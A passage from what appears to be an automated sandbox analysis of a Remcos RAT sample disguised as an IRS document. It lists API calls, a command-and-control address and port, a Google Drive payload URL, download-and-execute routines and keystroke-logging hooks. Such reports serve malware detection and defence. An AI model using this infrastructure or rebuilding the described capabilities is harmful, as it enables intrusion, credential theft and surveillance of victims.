Source: C:\Users\Public\Kaphkos.exeCode function: 14_2_00404298 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,14_2_00404298
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0018740F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,16_2_0018740F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_001904E0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t16_2_001904E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00187183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,16_2_00187183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00184648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA16_2_00184648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_001926D3 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,16_2_001926D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00184AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,16_2_00184AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_00183315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,16_2_00183315
Contains functionality to query local drivesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403B9A

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2026019 ET TROJAN Win32/Remcos RAT Checkin 29 192.168.2.5:49749 -> 185.140.53.207:2404
Contains functionality to download and execute PE filesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1053EE87 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z,2_2_1053EE87
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.5:49749 -> 185.140.53.207:2404
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 216.58.215.225 216.58.215.225
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Contains functionality to download additional files from the internetShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00402139 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00402139
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc-14-5k-docs.googleusercontent.com
Urls found in memory or binary dataShow sources
Source: irs Doc Attached.exeString found in binary or memory: https://drive.google.com/u/0/uc?id=1DVOxPIxWDKsRfVKPkR-5uTr9f2K9poRF&export=download
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to capture and log keystrokesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Esc] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Enter] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Tab] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Down] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Right] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Up] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Left] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [End] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F2] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F1] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 2_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Esc] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Enter] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Tab] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Down] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Right] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Up] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Left] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [End] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F2] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [F1] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 16_2_00185DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: [Del] 16_2_00185DA6
Contains functionality to register a low level keyboard hookShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10536C29 SetWindowsHookExA 0000000D,004051AE,00000000,000000002_2_10536C29
Contains functionality for read data from the clipboardShow sources
